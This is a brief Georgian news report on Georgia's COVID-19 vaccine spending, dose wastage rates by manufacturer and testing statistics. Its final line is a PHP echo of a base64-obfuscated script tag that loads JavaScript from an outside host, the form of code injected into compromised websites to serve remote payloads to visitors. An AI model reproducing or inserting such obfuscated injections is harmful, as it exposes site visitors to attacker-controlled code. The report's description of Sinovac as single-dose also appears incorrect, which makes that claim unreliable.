celsiusi
ავერსი საქკაბელი

პანდემიის განმავლობაში, დაავადებათა კონტროლის ეროვნული ცენტრის მიერ COVID 19-ის საწინააღმდეგო ვაქცინების შესაძენად 3,696,907.8 ლარია დახარჯული. ამის შესახებ "ინტერპრესნიუსს" დაავადებათა კონტროლის ეროვნული ცენტრიდან გამოთხოვილი საჯარო ინფორმაციის საპასუხოდ აცნობეს.

რაც შეეხება იმას, ვაქცინის რამდენი დოზის დანაკარგი აქვს სახელმწიფოს ანალოგიურ პერიოდში, როგორც ცენტრში განმარტავენ, 2021 წლის 13 მარტიდან ვაქცინების დანაკარგი შემდეგნაირად გამოიყურება:

"ასტრაზენეკა" - 3%;

"ფაიზერი" - 3,2%;

"სინოფარმი" - 1,1%;

რაც შეეხება „სინოვაკს“, ცენტრში განმარტავენ, რომ ის ერთდოზიანია და დანაკარგი პრაქტიკულად არ აქვთ.

რაც შეეხება კორონავირუსზე ტესტის ჩატარების სტატისტიკას, მონაცემების თანახმად, ბოლო 3 თვეში კორონავირუსზე 565 170 ტესტი ჩატარდა. აღნიშნულ პერიოდში კორონავირუსის 13 394 ახალი შემთხვევა დადასტურდა.

377
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");